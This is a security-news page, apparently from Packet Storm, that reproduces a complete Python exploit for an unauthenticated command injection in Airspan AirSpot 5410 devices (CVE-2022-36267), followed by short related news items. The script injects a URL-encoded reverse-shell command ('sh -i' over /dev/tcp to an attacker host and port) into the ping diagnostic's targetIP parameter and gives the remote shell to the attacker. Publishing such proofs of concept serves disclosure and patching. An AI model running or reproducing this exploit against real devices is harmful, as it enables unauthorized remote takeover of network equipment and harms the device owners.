Security
Headlines
HeadlinesLatestCVEs

Headline

AirSpot 5410 0.3.4.1-4 Remote Command Injection

AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

Packet Storm
#vulnerability#web#mac#ubuntu#pdf#auth
# -*- coding: utf-8 -*-# Exploit Title: AirSpot unauthenticated remote command injection# Date: 7/26/2022# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)# Vendor Homepage: https://www.airspan.com/# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf# Version: 0.3.4.1-4 and under.# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)# CVE : CVE-2022-36267from __future__ import print_function, unicode_literalsimport argparseimport requestsimport urllib3urllib3.disable_warnings()def banner():  airspanLogo = """       ,-.     / \  `.  __..-,O    :   \ --''_..-'.'    |    . .-' `. '.    :     .     .`.'     \     `.  /  ..      \      `.   ' .       `,       `.   \      ,|,`.        `-.\     '.||  ``-...__..-`      |  | Airspan       |__| AirSpot 5410      /||\ PWNED x_x     //||\\    // || \\ __//__||__\\__'--------------'Necrum Security Labs                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))def pingWebInterface(RHOST, RPORT):  url = 'https://{}:{}'.format(RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)    if response.status_code != 200:      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    print('[INFO] Airspan device web interface seems reachable!')  except:    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')    exit()def execReverseShell(RHOST, RPORT, LHOST, LPORT):  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)  try:    print('[INFO] Executing reverse shell...')    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))    return  except Exception as e:      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

Related news

Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

By Waqas The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022. This is a post from HackRead.com Read the original post: Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

CVE-2022-36267: Airspan-AirSpot-5410.md

In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution